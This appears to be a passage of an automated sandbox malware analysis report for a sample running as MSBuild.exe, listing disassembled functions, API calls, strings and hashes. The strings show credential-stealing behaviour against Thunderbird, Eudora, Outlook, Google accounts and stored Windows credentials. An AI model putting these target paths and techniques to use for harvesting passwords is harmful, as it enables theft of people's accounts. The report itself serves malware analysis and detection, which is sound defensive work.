Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79

Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,?), ref: 00401904
memset.MSVCRT ref: 00401917

Strings

WinPos, xrefs: 0040192A

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: PlacementWindowmemset
String ID: WinPos
API String ID: 4036792311-2823255486
Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729

Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5

wcsrchr.MSVCRT ref: 0040DCE9
wcscat.MSVCRT ref: 0040DCFF

Strings

_lng.ini, xrefs: 0040DCF9

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: FileModuleNamewcscatwcsrchr
String ID: _lng.ini
API String ID: 383090722-1948609170
Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F

Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884

GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4

Strings

SHGetSpecialFolderPathW, xrefs: 00414B9E
shell32.dll, xrefs: 00414B8A

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 2773794195-880857682
Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D

Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
memset.MSVCRT ref: 0042BAAE
memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8

Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A

??2@YAPAXI@Z.MSVCRT ref: 0040E84D
??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15

Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040A8E2

Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
Part of subcall function 004099F4: free.MSVCRT ref: 00409A31

free.MSVCRT ref: 0040A908
free.MSVCRT ref: 0040A92B
memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55

Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040B1DE
free.MSVCRT ref: 0040B201

Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
Part of subcall function 004099F4: free.MSVCRT ref: 00409A31

free.MSVCRT ref: 0040B224
memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98

Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3

Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0

memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcmp$memcpy
String ID:
API String ID: 231171946-0
Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E

Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040B0D8
free.MSVCRT ref: 0040B0FB

Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
Part of subcall function 004099F4: free.MSVCRT ref: 00409A31

free.MSVCRT ref: 0040B12C
memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: free$memcpy$mallocstrlen
String ID:
API String ID: 3669619086-0
Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F

Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
malloc.MSVCRT ref: 00417407
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
free.MSVCRT ref: 00417425

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWide$freemalloc
String ID:
API String ID: 2605342592-0
Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5

Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00409D29
wcslen.MSVCRT ref: 00409D33
wcscpy.MSVCRT ref: 00409D47

Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732

wcscat.MSVCRT ref: 00409D55

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: wcslen$wcscat$wcscpy
String ID:
API String ID: 1961120804-0
Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

Analysis Process: MSBuild.exePID: 8160, Parent PID: 7912COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	20.6%
Signature Coverage:	0.5%
Total number of Nodes:	841
Total number of Limit Nodes:	19

Executed Functions

Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040832F
memset.MSVCRT ref: 00408343
memset.MSVCRT ref: 0040835F
memset.MSVCRT ref: 00408376
GetComputerNameA.KERNEL32(?,?), ref: 00408398
GetUserNameA.ADVAPI32(?,?), ref: 004083AC
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
strlen.MSVCRT ref: 004083E9
strlen.MSVCRT ref: 004083F8
memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A

Strings

O, xrefs: 00408319
}, xrefs: 00408315
H, xrefs: 00408325
b, xrefs: 004082FD
i, xrefs: 004082F5
5, xrefs: 00408311
}, xrefs: 00408321

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
String ID: 5$H$O$b$i$}$}
API String ID: 1832431107-3760989150
Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
strlen.MSVCRT ref: 00407F5C
strlen.MSVCRT ref: 00407F64

Strings

ACD, xrefs: 00407F47

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: FileFindstrlen$FirstNext
String ID: ACD
API String ID: 379999529-620537770
Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00401E8B
strlen.MSVCRT ref: 00401EA4
strlen.MSVCRT ref: 00401EB2
strlen.MSVCRT ref: 00401EF8
strlen.MSVCRT ref: 00401F06
memset.MSVCRT ref: 00401FB1
atoi.MSVCRT(?), ref: 00401FE0
memset.MSVCRT ref: 00402003
sprintf.MSVCRT ref: 00402030

Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57

memset.MSVCRT ref: 00402086
memset.MSVCRT ref: 0040209B
strlen.MSVCRT ref: 004020A1
strlen.MSVCRT ref: 004020AF
strlen.MSVCRT ref: 004020E2
strlen.MSVCRT ref: 004020F0
memset.MSVCRT ref: 00402018

Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA

_mbscpy.MSVCRT(?,00000000), ref: 00402177
RegCloseKey.ADVAPI32(00000000), ref: 00402181
ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C

Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85

Strings

%s\Main, xrefs: 0040202A
nss3.dll, xrefs: 004020DD, 00402105
Software\Classes\Software\Qualcomm\Eudora\CommandLine\current, xrefs: 00401F6A
Software\Mozilla\Mozilla Thunderbird, xrefs: 00401F86
sqlite3.dll, xrefs: 00401FD4, 004020A0, 004020C5
%programfiles%\Mozilla Thunderbird, xrefs: 00402197
Install Directory, xrefs: 0040203D
Mozilla\Profiles, xrefs: 00401E9E, 00401EA3, 00401ECB
Software\Qualcomm\Eudora\CommandLine, xrefs: 00401F44
Thunderbird\Profiles, xrefs: 00401EED, 00401F1B
current, xrefs: 00401F3F

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
API String ID: 1846531875-4223776976
Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09

??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
DeleteObject.GDI32(?), ref: 0040D1A6

Strings

/deleteregkey, xrefs: 0040CFE4
, xrefs: 0040CF7E
/savelangfile, xrefs: 0040CFB6
Failed to load the executable file !, xrefs: 0040D036
Error, xrefs: 0040D031

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
API String ID: 745651260-375988210
Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD

LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
_mbscpy.MSVCRT(?,?), ref: 00403E54

Strings

www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
pstorec.dll, xrefs: 00403C30
www.google.com/Please log in to your Gmail account, xrefs: 00403C86
PStoreCreateInstance, xrefs: 00403C44
www.google.com/Please log in to your Google Account, xrefs: 00403C9A
www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadProc_mbscpy
String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
API String ID: 1197458902-317895162
Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27

Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754

memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
memcpy.MSVCRT(?,?,?), ref: 0040FBF9

Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F

LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31

Strings

Software\Microsoft\IdentityCRL, xrefs: 0040FB27
XnE, xrefs: 0040FBBB
Value, xrefs: 0040FB65
Dynamic Salt, xrefs: 0040FB42

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
API String ID: 2768085393-2409096184
Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

Function 00444C4A Relevance: 18.1, APIs: 12, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,0044C4C0,00000070), ref: 00444C5F
__set_app_type.MSVCRT ref: 00444CB8
__p__fmode.MSVCRT ref: 00444CCD
__p__commode.MSVCRT ref: 00444CDB
__setusermatherr.MSVCRT ref: 00444D07
_initterm.MSVCRT ref: 00444D1D
__getmainargs.MSVCRT ref: 00444D40
_initterm.MSVCRT ref: 00444D53
GetStartupInfoA.KERNEL32(?), ref: 00444D92
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00444DB6
exit.KERNELBASE ref: 00444DC9
_cexit.MSVCRT ref: 00444DCF

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
String ID:
API String ID: 3662548030-0
Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0044430B

Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2

Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
